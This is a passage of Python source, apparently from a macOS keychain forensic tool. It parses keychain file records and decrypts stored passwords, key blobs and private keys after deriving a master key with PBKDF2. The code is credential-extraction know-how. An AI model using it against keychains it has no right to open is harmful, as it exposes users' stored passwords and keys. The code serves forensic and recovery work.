#/* Record Types defined in the Open Group Application Name Space */
#/* Open Group Application Name Space Range Definition*/
CSSM_DB_RECORDTYPE_OPEN_GROUP_START = 0x0000000A
CSSM_DL_DB_RECORD_ANY = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 0
CSSM_DL_DB_RECORD_CERT = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 1
CSSM_DL_DB_RECORD_CRL = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 2
CSSM_DL_DB_RECORD_POLICY = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 3
CSSM_DL_DB_RECORD_GENERIC = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 4
CSSM_DL_DB_RECORD_PUBLIC_KEY = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 5
CSSM_DL_DB_RECORD_PRIVATE_KEY = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 6
CSSM_DL_DB_RECORD_SYMMETRIC_KEY = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 7
CSSM_DL_DB_RECORD_ALL_KEYS = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 8
CSSM_DB_RECORDTYPE_OPEN_GROUP_END = CSSM_DB_RECORDTYPE_OPEN_GROUP_START + 8
#####################
######## KEYUSE #########
CSSM_KEYUSE_ANY = 0x80000000
CSSM_KEYUSE_ENCRYPT = 0x00000001
CSSM_KEYUSE_DECRYPT = 0x00000002
CSSM_KEYUSE_SIGN = 0x00000004
CSSM_KEYUSE_VERIFY = 0x00000008
CSSM_KEYUSE_SIGN_RECOVER = 0x00000010
CSSM_KEYUSE_VERIFY_RECOVER = 0x00000020
CSSM_KEYUSE_WRAP = 0x00000040
CSSM_KEYUSE_UNWRAP = 0x00000080
CSSM_KEYUSE_DERIVE = 0x00000100
####################
############ CERT TYPE ##############
CERT_TYPE = {
0x00 : 'CSSM_CERT_UNKNOWN',
0x01 : 'CSSM_CERT_X_509v1',
0x02 : 'CSSM_CERT_X_509v2',
0x03 : 'CSSM_CERT_X_509v3',
0x04 : 'CSSM_CERT_PGP',
0x05 : 'CSSM_CERT_SPKI',
0x06 : 'CSSM_CERT_SDSIv1',
0x08 : 'CSSM_CERT_Intel',
0x09 : 'CSSM_CERT_X_509_ATTRIBUTE',
0x0A : 'CSSM_CERT_X9_ATTRIBUTE',
0x0C : 'CSSM_CERT_ACL_ENTRY',
0x7FFE: 'CSSM_CERT_MULTIPLE',
0x7FFF : 'CSSM_CERT_LAST',
0x8000 : 'CSSM_CL_CUSTOM_CERT_TYPE'
}
####################################
########### CERT ENCODING #############
CERT_ENCODING = {
0x00 : 'CSSM_CERT_ENCODING_UNKNOWN',
0x01 : 'CSSM_CERT_ENCODING_CUSTOM',
0x02 : 'CSSM_CERT_ENCODING_BER',
0x03 : 'CSSM_CERT_ENCODING_DER',
0x04 : 'CSSM_CERT_ENCODING_NDR',
0x05 : 'CSSM_CERT_ENCODING_SEXPR',
0x06 : 'CSSM_CERT_ENCODING_PGP',
0x7FFE: 'CSSM_CERT_ENCODING_MULTIPLE',
0x7FFF : 'CSSM_CERT_ENCODING_LAST'
}
STD_APPLE_ADDIN_MODULE = {
'{87191ca0-0fc9-11d4-849a-000502b52122}': 'CSSM itself',
'{87191ca1-0fc9-11d4-849a-000502b52122}': 'File based DL (aka "Keychain DL")',
'{87191ca2-0fc9-11d4-849a-000502b52122}': 'Core CSP (local space)',
'{87191ca3-0fc9-11d4-849a-000502b52122}': 'Secure CSP/DL (aka "Keychain CSPDL")',
'{87191ca4-0fc9-11d4-849a-000502b52122}': 'X509 Certificate CL',
'{87191ca5-0fc9-11d4-849a-000502b52122}': 'X509 Certificate TP',
'{87191ca6-0fc9-11d4-849a-000502b52122}': 'DLAP/OpenDirectory access DL',
'{87191ca7-0fc9-11d4-849a-000502b52122}': 'TP for ".mac" related policies',
'{87191ca8-0fc9-11d4-849a-000502b52122}': 'Smartcard CSP/DL',
'{87191ca9-0fc9-11d4-849a-000502b52122}': 'DL for ".mac" certificate access'
}
SECURE_STORAGE_GROUP = 'ssgp'
AUTH_TYPE = {
'ntlm': 'kSecAuthenticationTypeNTLM',
'msna': 'kSecAuthenticationTypeMSN',
'dpaa': 'kSecAuthenticationTypeDPA',
'rpaa': 'kSecAuthenticationTypeRPA',
'http': 'kSecAuthenticationTypeHTTPBasic',
'httd': 'kSecAuthenticationTypeHTTPDigest',
'form': 'kSecAuthenticationTypeHTMLForm',
'dflt': 'kSecAuthenticationTypeDefault',
'': 'kSecAuthenticationTypeAny',
'\x00\x00\x00\x00': 'kSecAuthenticationTypeAny'
}
PROTOCOL_TYPE = {
'ftp ': 'kSecProtocolTypeFTP',
'ftpa': 'kSecProtocolTypeFTPAccount',
'http': 'kSecProtocolTypeHTTP',
'irc ': 'kSecProtocolTypeIRC',
'nntp': 'kSecProtocolTypeNNTP',
'pop3': 'kSecProtocolTypePOP3',
'smtp': 'kSecProtocolTypeSMTP',
'sox ': 'kSecProtocolTypeSOCKS',
'imap': 'kSecProtocolTypeIMAP',
'ldap': 'kSecProtocolTypeLDAP',
'atlk': 'kSecProtocolTypeAppleTalk',
'afp ': 'kSecProtocolTypeAFP',
'teln': 'kSecProtocolTypeTelnet',
'ssh ': 'kSecProtocolTypeSSH',
'ftps': 'kSecProtocolTypeFTPS',
'htps': 'kSecProtocolTypeHTTPS',
'htpx': 'kSecProtocolTypeHTTPProxy',
'htsx': 'kSecProtocolTypeHTTPSProxy',
'ftpx': 'kSecProtocolTypeFTPProxy',
'cifs': 'kSecProtocolTypeCIFS',
'smb ': 'kSecProtocolTypeSMB',
'rtsp': 'kSecProtocolTypeRTSP',
'rtsx': 'kSecProtocolTypeRTSPProxy',
'daap': 'kSecProtocolTypeDAAP',
'eppc': 'kSecProtocolTypeEPPC',
'ipp ': 'kSecProtocolTypeIPP',
'ntps': 'kSecProtocolTypeNNTPS',
'ldps': 'kSecProtocolTypeLDAPS',
'tels': 'kSecProtocolTypeTelnetS',
'imps': 'kSecProtocolTypeIMAPS',
'ircs': 'kSecProtocolTypeIRCS',
'pops': 'kSecProtocolTypePOP3S',
'cvsp': 'kSecProtocolTypeCVSpserver',
'svn ': 'kSecProtocolTypeCVSpserver',
'AdIM': 'kSecProtocolTypeAdiumMessenger',
'\x00\x00\x00\x00': 'kSecProtocolTypeAny'
}
# This is somewhat gross: we define a bunch of module-level constants based on
# the SecKeychainItem.h defines (FourCharCodes) by passing them through
# struct.unpack and converting them to ctypes.c_long() since we'll never use
# them for non-native APIs
CARBON_DEFINES = {
'cdat': 'kSecCreationDateItemAttr',
'mdat': 'kSecModDateItemAttr',
'desc': 'kSecDescriptionItemAttr',
'icmt': 'kSecCommentItemAttr',
'crtr': 'kSecCreatorItemAttr',
'type': 'kSecTypeItemAttr',
'scrp': 'kSecScriptCodeItemAttr',
'labl': 'kSecLabelItemAttr',
'invi': 'kSecInvisibleItemAttr',
'nega': 'kSecNegativeItemAttr',
'cusi': 'kSecCustomIconItemAttr',
'acct': 'kSecAccountItemAttr',
'svce': 'kSecServiceItemAttr',
'gena': 'kSecGenericItemAttr',
'sdmn': 'kSecSecurityDomainItemAttr',
'srvr': 'kSecServerItemAttr',
'atyp': 'kSecAuthenticationTypeItemAttr',
'port': 'kSecPortItemAttr',
'path': 'kSecPathItemAttr',
'vlme': 'kSecVolumeItemAttr',
'addr': 'kSecAddressItemAttr',
'ssig': 'kSecSignatureItemAttr',
'ptcl': 'kSecProtocolItemAttr',
'ctyp': 'kSecCertificateType',
'cenc': 'kSecCertificateEncoding',
'crtp': 'kSecCrlType',
'crnc': 'kSecCrlEncoding',
'alis': 'kSecAlias',
'inet': 'kSecInternetPasswordItemClass',
'genp': 'kSecGenericPasswordItemClass',
'ashp': 'kSecAppleSharePasswordItemClass',
CSSM_DL_DB_RECORD_X509_CERTIFICATE: 'kSecCertificateItemClass'
}
BLOCKLEN = 20
# this is what you want to call.
def pbkdf2(password, salt, itercount, keylen, hashfn=sha):
# l - number of output blocks to produce
l = keylen / BLOCKLEN
if keylen % BLOCKLEN != 0:
l += 1
h = hmac.new(password, None, hashfn)
T = ""
for i in range(1, l + 1):
T += pbkdf2_F(h, salt, itercount, i)
return T[: -( BLOCKLEN - keylen % BLOCKLEN)]
def xorstr(a, b):
if len(a) != len(b):
raise "xorstr(): lengths differ"
ret = ''
for i in range(len(a)):
ret += chr(ord(a[i]) ^ ord(b[i]))
return ret
def prf(h, data):
hm = h.copy()
hm.update(data)
return hm.digest()
# Helper as per the spec. h is a hmac which has been created seeded with the
# password, it will be copy()ed and not modified.
def pbkdf2_F(h, salt, itercount, blocknum):
U = prf(h, salt + pack('>i', blocknum))
T = U
for i in range(2, itercount + 1):
U = prf(h, U)
T = xorstr(T, U)
return T
ATOM_SIZE = 4
SIZEOFKEYCHAINTIME = 16
KEYCHAIN_SIGNATURE = "kych"
DBBLOB_SIGNATURE = unhexlify('fade0711')
BLOCKSIZE = 8
KEYLEN = 24
class _APPL_DB_HEADER(BigEndianStructure):
_fields_ = [
("Signature", c_char*4),
("Version", c_int),
("HeaderSize", c_int),
("SchemaOffset", c_int),
("AuthOffset", c_int)
]
class _APPL_DB_SCHEMA(BigEndianStructure):
_fields_ = [
("SchemaSize", c_int),
("TableCount", c_int)
]
class _KEY_BLOB_REC_HEADER(BigEndianStructure):
_fields_ = [
("RecordSize", c_uint),
("RecordCount", c_uint),
("Dummy", c_char*0x7C),
]
class _KEY_BLOB_RECORD(BigEndianStructure):
_fields_ = [
("Signature", c_uint),
("Version", c_uint),
("CipherOffset", c_uint),
("TotalLength", c_uint)
]
class _GENERIC_PW_HEADER(BigEndianStructure):
_fields_ = [
("RecordSize", c_uint),
("RecordNumber", c_uint),
("Unknown2", c_uint),
("Unknown3", c_uint),
("SSGPArea", c_uint),
("Unknown5", c_uint),
("CreationDate", c_uint),
("ModDate", c_uint),
("Description", c_uint),
("Comment", c_uint),
("Creator", c_uint),
("Type", c_uint),
("ScriptCode", c_uint),
("PrintName", c_uint),
("Alias", c_uint),
("Invisible", c_uint),
("Negative", c_uint),
("CustomIcon", c_uint),
("Protected", c_uint),
("Account", c_uint),
("Service", c_uint),
("Generic", c_uint)
]
class _APPLE_SHARE_HEADER(BigEndianStructure):
_fields_ = [
("RecordSize", c_uint),
("RecordNumber", c_uint),
("Unknown2", c_uint),
("Unknown3", c_uint),
("SSGPArea", c_uint),
("Unknown5", c_uint),
("CreationDate", c_uint),
("ModDate", c_uint),
("Description", c_uint),
("Comment", c_uint),
("Creator", c_uint),
("Type", c_uint),
("ScriptCode", c_uint),
("PrintName", c_uint),
("Alias", c_uint),
("Invisible", c_uint),
("Negative", c_uint),
("CustomIcon", c_uint),
("Protected", c_uint),
("Account", c_uint),
("Volume", c_uint),
("Server", c_uint),
("Protocol", c_uint),
("AuthType", c_uint),
("Address", c_uint),
("Signature", c_uint)
]
class _INTERNET_PW_HEADER(BigEndianStructure):
_fields_ = [
("RecordSize", c_uint),
("RecordNumber", c_uint),
("Unknown2", c_uint),
("Unknown3", c_uint),
("SSGPArea", c_uint),
("Unknown5", c_uint),
("CreationDate", c_uint),
("ModDate", c_uint),
("Description", c_uint),
("Comment", c_uint),
("Creator", c_uint),
("Type", c_uint),
("ScriptCode", c_uint),
("PrintName", c_uint),
("Alias", c_uint),
("Invisible", c_uint),
("Negative", c_uint),
("CustomIcon", c_uint),
("Protected", c_uint),
("Account", c_uint),
("SecurityDomain", c_uint),
("Server", c_uint),
("Protocol", c_uint),
("AuthType", c_uint),
("Port", c_uint),
("Path", c_uint)
]
class _X509_CERT_HEADER(BigEndianStructure):
_fields_ = [
("RecordSize", c_uint),
("RecordNumber", c_uint),
("Unknown1", c_uint),
("Unknown2", c_uint),
("CertSize", c_uint),
("Unknown3", c_uint),
("CertType", c_uint),
("CertEncoding", c_uint),
("PrintName", c_uint),
("Alias", c_uint),
("Subject", c_uint),
("Issuer", c_uint),
("SerialNumber", c_uint),
("SubjectKeyIdentifier", c_uint),
("PublicKeyHash", c_uint)
]
# http://www.opensource.apple.com/source/Security/Security-55179.1/include/security_cdsa_utilities/KeySchema.h
# http://www.opensource.apple.com/source/libsecurity_keychain/libsecurity_keychain-36940/lib/SecKey.h
class _SECKEY_HEADER(BigEndianStructure):
_fields_ = [
("RecordSize", c_uint),
("RecordNumber", c_uint),
("Unknown1", c_uint),
("Unknown2", c_uint),
("BlobSize", c_uint),
("Unknown3", c_uint),
("KeyClass", c_uint),
("PrintName", c_uint),
("Alias", c_uint),
("Permanent", c_uint),
("Private", c_uint),
("Modifiable", c_uint),
("Label", c_uint),
("ApplicationTag", c_uint),
("KeyCreator", c_uint),
("KeyType", c_uint),
("KeySizeInBits", c_uint),
("EffectiveKeySize", c_uint),
("StartDate", c_uint),
("EndDate", c_uint),
("Sensitive", c_uint),
("AlwaysSensitive", c_uint),
("Extractable", c_uint),
("NeverExtractable", c_uint),
("Encrypt", c_uint),
("Decrypt", c_uint),
("Derive", c_uint),
("Sign", c_uint),
("Verify", c_uint),
("SignRecover", c_uint),
("VerifyRecover", c_uint),
("Wrap", c_uint),
("Wrap", c_uint)
]
class _TABLE_HEADER(BigEndianStructure):
_fields_ = [
("TableSize", c_uint),
("TableId", c_uint),
("RecordCount", c_uint),
("Records", c_uint),
("IndexesOffset", c_uint),
("FreeListHead", c_uint),
("RecordNumbersCount", c_uint),
#("RecordNumbers", c_uint)
]
class _SCHEMA_INFO_RECORD(BigEndianStructure):
_fields_ = [
("RecordSize", c_uint),
("RecordNumber", c_uint),
("Unknown2", c_uint),
("Unknown3", c_uint),
("Unknown4", c_uint),
("Unknown5", c_uint),
("Unknown6", c_uint),
("RecordType", c_uint),
("DataSize", c_uint),
("Data", c_uint)
]
class _ENCRYPTED_BLOB_METADATA(BigEndianStructure):
_fields_ = [
("MagicNumber", c_uint),
("Unknown", c_uint),
("StartOffset", c_uint),
("EndOffset", c_uint)
]
def _memcpy(buf, fmt):
return cast(c_char_p(buf), POINTER(fmt)).contents
class KeyChain():
def __init__(self, filepath):
self.filepath = filepath
self.fbuf = ''
def open(self):
try:
fhandle = open(self.filepath, 'rb')
except:
return False
self.fbuf = fhandle.read()
if len(self.fbuf):
fhandle.close()
return True
return False
def checkValidKeychain(self):
if self.fbuf[0:4] != KEYCHAIN_SIGNATURE:
return False
return True
## get apple DB Header
def getHeader(self):
header = _memcpy(self.fbuf[:sizeof(_APPL_DB_HEADER)], _APPL_DB_HEADER)
return header
def getSchemaInfo(self, offset):
table_list = []
#schema_info = struct.unpack(APPL_DB_SCHEMA, self.fbuf[offset:offset + APPL_DB_SCHEMA_SIZE])
_schemainfo = _memcpy(self.fbuf[offset:offset+sizeof(_APPL_DB_SCHEMA)], _APPL_DB_SCHEMA)
for i in xrange(_schemainfo.TableCount):
BASE_ADDR = sizeof(_APPL_DB_HEADER) + sizeof(_APPL_DB_SCHEMA)
table_list.append(
struct.unpack('>I', self.fbuf[BASE_ADDR + (ATOM_SIZE * i):BASE_ADDR + (ATOM_SIZE * i) + ATOM_SIZE])[0])
return _schemainfo, table_list
def getTable(self, offset):
record_list = []
BASE_ADDR = sizeof(_APPL_DB_HEADER) + offset
TableMetaData = _memcpy(self.fbuf[BASE_ADDR:BASE_ADDR+sizeof(_TABLE_HEADER)], _TABLE_HEADER)
RECORD_OFFSET_BASE = BASE_ADDR + sizeof(_TABLE_HEADER)
record_count = 0
offset = 0
while TableMetaData.RecordCount != record_count:
RecordOffset = struct.unpack('>I', self.fbuf[
RECORD_OFFSET_BASE + (ATOM_SIZE * offset):RECORD_OFFSET_BASE + (
ATOM_SIZE * offset) + ATOM_SIZE])[0]
# if len(record_list) >= 1:
# if record_list[len(record_list)-1] >= RecordOffset:
# continue
if (RecordOffset != 0x00) and (RecordOffset%4 == 0):
record_list.append(RecordOffset)
#print ' [-] Record Offset: 0x%.8x'%RecordOffset
record_count += 1
offset +=1
return TableMetaData, record_list
def getTablenametoList(self, recordList, tableList):
TableDic = {}
for count in xrange(len(recordList)):
tableMeta, GenericList = self.getTable(tableList[count])
TableDic[tableMeta.TableId] = count # extract valid table list
return len(recordList), TableDic
def getSchemaInfoRecord(self, base_addr, offset):
record_meta = []
record = []
BASE_ADDR = sizeof(_APPL_DB_HEADER) + base_addr + offset
#print BASE_ADDR
RecordMetadata = _memcpy(self.fbuf[BASE_ADDR:BASE_ADDR+sizeof(_SCHEMA_INFO_RECORD)], _SCHEMA_INFO_RECORD)
data = self.fbuf[BASE_ADDR + 40:BASE_ADDR + 40 + RecordMetadata.DataSize]
for record_element in RecordMetadata:
record.append(record_element)
record.append(data)
return record
def getKeyblobRecord(self, base_addr, offset):
BASE_ADDR = sizeof(_APPL_DB_HEADER) + base_addr + offset
KeyBlobRecHeader = _memcpy(self.fbuf[BASE_ADDR:BASE_ADDR+sizeof(_KEY_BLOB_REC_HEADER)], _KEY_BLOB_REC_HEADER)
# record_meta[0] => record size
record = self.fbuf[BASE_ADDR + sizeof(_KEY_BLOB_REC_HEADER):BASE_ADDR + KeyBlobRecHeader.RecordSize] # password data area
KeyBlobRecord = _memcpy(record[:sizeof(_KEY_BLOB_RECORD)], _KEY_BLOB_RECORD)
if SECURE_STORAGE_GROUP != str(record[KeyBlobRecord.TotalLength + 8:KeyBlobRecord.TotalLength + 8 + 4]):
#print 'not ssgp %s'%str(record[KeyBlobRecord.TotalLength + 8:KeyBlobRecord.TotalLength + 8 + 4])
#exit()
return '', '', '', 1
CipherLen = KeyBlobRecord.TotalLength - KeyBlobRecord.CipherOffset
if CipherLen % BLOCKSIZE != 0:
print "Bad ciphertext len"
iv = record[16:24]
ciphertext = record[KeyBlobRecord.CipherOffset:KeyBlobRecord.TotalLength]
# match data, keyblob_ciphertext, Initial Vector, success
return record[KeyBlobRecord.TotalLength + 8:KeyBlobRecord.TotalLength + 8 + 20], ciphertext, iv, 0
def getGenericPWRecord(self, base_addr, offset):
record = []
BASE_ADDR = sizeof(_APPL_DB_HEADER) + base_addr + offset
RecordMeta = _memcpy(self.fbuf[BASE_ADDR:BASE_ADDR+sizeof(_GENERIC_PW_HEADER)], _GENERIC_PW_HEADER)
Buffer = self.fbuf[BASE_ADDR + sizeof(_GENERIC_PW_HEADER):BASE_ADDR + RecordMeta.RecordSize] # record_meta[0] => record size
if RecordMeta.SSGPArea != 0:
record.append(Buffer[:RecordMeta.SSGPArea])
else:
record.append('')
record.append(self.getKeychainTime(BASE_ADDR, RecordMeta.CreationDate & 0xFFFFFFFE))
record.append(self.getKeychainTime(BASE_ADDR, RecordMeta.ModDate & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Description & 0xFFFFFFFE))
record.append(self.getFourCharCode(BASE_ADDR, RecordMeta.Creator & 0xFFFFFFFE))
record.append(self.getFourCharCode(BASE_ADDR, RecordMeta.Type & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.PrintName & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Alias & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Account & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Service & 0xFFFFFFFE))
return record
def getInternetPWRecord(self, base_addr, offset):
record = []
BASE_ADDR = sizeof(_APPL_DB_HEADER) + base_addr + offset
RecordMeta = _memcpy(self.fbuf[BASE_ADDR:BASE_ADDR+sizeof(_INTERNET_PW_HEADER)], _INTERNET_PW_HEADER)
Buffer = self.fbuf[BASE_ADDR + sizeof(_INTERNET_PW_HEADER):BASE_ADDR + RecordMeta.RecordSize]
if RecordMeta.SSGPArea != 0:
record.append(Buffer[:RecordMeta.SSGPArea])
else:
record.append('')
record.append(self.getKeychainTime(BASE_ADDR, RecordMeta.CreationDate & 0xFFFFFFFE))
record.append(self.getKeychainTime(BASE_ADDR, RecordMeta.ModDate & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Description & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Comment & 0xFFFFFFFE))
record.append(self.getFourCharCode(BASE_ADDR, RecordMeta.Creator & 0xFFFFFFFE))
record.append(self.getFourCharCode(BASE_ADDR, RecordMeta.Type & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.PrintName & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Alias & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Protected & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Account & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.SecurityDomain & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Server & 0xFFFFFFFE))
record.append(self.getFourCharCode(BASE_ADDR, RecordMeta.Protocol & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.AuthType & 0xFFFFFFFE))
record.append(self.getInt(BASE_ADDR, RecordMeta.Port & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Path & 0xFFFFFFFE))
return record
def getx509Record(self, base_addr, offset):
record = []
BASE_ADDR = sizeof(_APPL_DB_HEADER) + base_addr + offset
RecordMeta = _memcpy(self.fbuf[BASE_ADDR:BASE_ADDR+sizeof(_X509_CERT_HEADER)], _X509_CERT_HEADER)
x509Certificate = self.fbuf[BASE_ADDR + sizeof(_X509_CERT_HEADER):BASE_ADDR + sizeof(_X509_CERT_HEADER) + RecordMeta.CertSize]
record.append(self.getInt(BASE_ADDR, RecordMeta.CertType & 0xFFFFFFFE)) # Cert Type
record.append(self.getInt(BASE_ADDR, RecordMeta.CertEncoding & 0xFFFFFFFE)) # Cert Encoding
record.append(self.getLV(BASE_ADDR, RecordMeta.PrintName & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Alias & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Subject & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Issuer & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.SerialNumber & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.SubjectKeyIdentifier & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.PublicKeyHash & 0xFFFFFFFE))
record.append(x509Certificate)
return record
def getKeyRecord(self, base_addr, offset): ## PUBLIC and PRIVATE KEY
record = []
BASE_ADDR = sizeof(_APPL_DB_HEADER) + base_addr + offset
RecordMeta = _memcpy(self.fbuf[BASE_ADDR:BASE_ADDR+sizeof(_SECKEY_HEADER)], _SECKEY_HEADER)
KeyBlob = self.fbuf[BASE_ADDR + sizeof(_SECKEY_HEADER):BASE_ADDR + sizeof(_SECKEY_HEADER) + RecordMeta.BlobSize]
record.append(self.getLV(BASE_ADDR, RecordMeta.PrintName & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Label & 0xFFFFFFFE))
record.append(self.getInt(BASE_ADDR, RecordMeta.KeyClass & 0xFFFFFFFE))
record.append(self.getInt(BASE_ADDR, RecordMeta.Private & 0xFFFFFFFE))
record.append(self.getInt(BASE_ADDR, RecordMeta.KeyType & 0xFFFFFFFE))
record.append(self.getInt(BASE_ADDR, RecordMeta.KeySizeInBits & 0xFFFFFFFE))
record.append(self.getInt(BASE_ADDR, RecordMeta.EffectiveKeySize & 0xFFFFFFFE))
record.append(self.getInt(BASE_ADDR, RecordMeta.Extractable & 0xFFFFFFFE))
record.append(str(self.getLV(BASE_ADDR, RecordMeta.KeyCreator & 0xFFFFFFFE)).split('\x00')[0])
IV, Key = self.getEncryptedDatainBlob(KeyBlob)
record.append(IV)
record.append(Key)
return record
def getEncryptedDatainBlob(self, BlobBuf):
magicNumber = 0xFADE0711
IVSize = 8
EncryptedBlobMeta = _memcpy(BlobBuf[:sizeof(_ENCRYPTED_BLOB_METADATA)], _ENCRYPTED_BLOB_METADATA)
if EncryptedBlobMeta.MagicNumber != magicNumber:
return '', ''
KeyData = BlobBuf[EncryptedBlobMeta.StartOffset:EncryptedBlobMeta.EndOffset]
IV = BlobBuf[sizeof(_ENCRYPTED_BLOB_METADATA):sizeof(_ENCRYPTED_BLOB_METADATA)+IVSize]
return IV, KeyData # IV, Encrypted Data
def getKeychainTime(self, BASE_ADDR, pCol):
if pCol <= 0:
return ''
else:
data = str(struct.unpack('>16s', self.fbuf[BASE_ADDR + pCol:BASE_ADDR + pCol + struct.calcsize('>16s')])[0])
return datetime.datetime.strptime(data.strip('\x00'), '%Y%m%d%H%M%SZ')
def getInt(self, BASE_ADDR, pCol):
if pCol <= 0:
return 0
else:
return struct.unpack('>I', self.fbuf[BASE_ADDR + pCol:BASE_ADDR + pCol + 4])[0]
def getFourCharCode(self, BASE_ADDR, pCol):
if pCol <= 0:
return ''
else:
return struct.unpack('>4s', self.fbuf[BASE_ADDR + pCol:BASE_ADDR + pCol + 4])[0]
def getLV(self, BASE_ADDR, pCol):
if pCol <= 0:
return ''
str_length = struct.unpack('>I', self.fbuf[BASE_ADDR + pCol:BASE_ADDR + pCol + 4])[0]
# 4byte arrangement
if (str_length % 4) == 0:
real_str_len = (str_length / 4) * 4
else:
real_str_len = ((str_length / 4) + 1) * 4
unpack_value = '>' + str(real_str_len) + 's'
try:
data = struct.unpack(unpack_value, self.fbuf[BASE_ADDR + pCol + 4:BASE_ADDR + pCol + 4 + real_str_len])[0]
except struct.error:
print 'Length is too long : %d'%real_str_len
return ''
return data
def getAppleshareRecord(self, base_addr, offset):
record = []
BASE_ADDR = sizeof(_APPL_DB_HEADER) + base_addr + offset
RecordMeta = _memcpy(self.fbuf[BASE_ADDR:BASE_ADDR+sizeof(_APPLE_SHARE_HEADER)], _APPLE_SHARE_HEADER)
Buffer = self.fbuf[BASE_ADDR + sizeof(_APPLE_SHARE_HEADER):BASE_ADDR + RecordMeta.RecordSize]
if RecordMeta.SSGPArea != 0:
record.append(Buffer[:RecordMeta.SSGPArea])
else:
record.append('')
record.append(self.getKeychainTime(BASE_ADDR, RecordMeta.CreationDate & 0xFFFFFFFE))
record.append(self.getKeychainTime(BASE_ADDR, RecordMeta.ModDate & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Description & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Comment & 0xFFFFFFFE))
record.append(self.getFourCharCode(BASE_ADDR, RecordMeta.Creator & 0xFFFFFFFE))
record.append(self.getFourCharCode(BASE_ADDR, RecordMeta.Type & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.PrintName & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Alias & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Protected & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Account & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Volume & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Server & 0xFFFFFFFE))
record.append(self.getFourCharCode(BASE_ADDR, RecordMeta.Protocol & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Address & 0xFFFFFFFE))
record.append(self.getLV(BASE_ADDR, RecordMeta.Signature & 0xFFFFFFFE))
return record
## decrypted dbblob area
## Documents : http://www.opensource.apple.com/source/securityd/securityd-55137.1/doc/BLOBFORMAT
## http://www.opensource.apple.com/source/libsecurity_keychain/libsecurity_keychain-36620/lib/StorageManager.cpp
def DBBlobDecryption(self, securestoragegroup, dbkey):
iv = securestoragegroup[20:28]
plain = kcdecrypt(dbkey, iv, securestoragegroup[28:])
return plain
# Documents : http://www.opensource.apple.com/source/securityd/securityd-55137.1/doc/BLOBFORMAT
# source : http://www.opensource.apple.com/source/libsecurity_cdsa_client/libsecurity_cdsa_client-36213/lib/securestorage.cpp
# magicCmsIV : http://www.opensource.apple.com/source/Security/Security-28/AppleCSP/AppleCSP/wrapKeyCms.cpp
def KeyblobDecryption(self, encryptedblob, iv, dbkey):
magicCmsIV = unhexlify('4adda22c79e82105')
plain = kcdecrypt(dbkey, magicCmsIV, encryptedblob)
if plain.__len__() == 0:
return ''
# now we handle the unwrapping. we need to take the first 32 bytes,
# and reverse them.
revplain = ''
for i in range(32):
revplain += plain[31 - i]
# now the real key gets found. */
plain = kcdecrypt(dbkey, iv, revplain)
keyblob = plain[4:]
if len(keyblob) != KEYLEN:
#raise "Bad decrypted keylen!"
return ''
return keyblob
# test code
#http://opensource.apple.com/source/libsecurity_keychain/libsecurity_keychain-55044/lib/KeyItem.cpp
def PrivateKeyDecryption(self, encryptedblob, iv, dbkey):
magicCmsIV = unhexlify('4adda22c79e82105')
plain = kcdecrypt(dbkey, magicCmsIV, encryptedblob)
if plain.__len__() == 0:
return ''
# now we handle the unwrapping. we need to take the first 32 bytes,
# and reverse them.
revplain = ''
for i in range(len(plain)):
revplain += plain[len(plain)-1 - i]
# now the real key gets found. */
plain = kcdecrypt(dbkey, iv, revplain)
#hexdump(plain)
Keyname = plain[:12] # Copied Buffer when user click on right and copy a key on Keychain Access
keyblob = plain[12:]
return Keyname, keyblob
## Documents : http://www.opensource.apple.com/source/securityd/securityd-55137.1/doc/BLOBFORMAT
def generateMasterKey(self, pw, symmetrickey_offset):
base_addr = sizeof(_APPL_DB_HEADER) + symmetrickey_offset + 0x38 # header
# salt
SALTLEN = 20
salt = self.fbuf[base_addr + 44:base_addr + 44 + SALTLEN]
masterkey = pbkdf2(pw, salt, 1000, KEYLEN)
return masterkey
## find DBBlob and extract Wrapping key
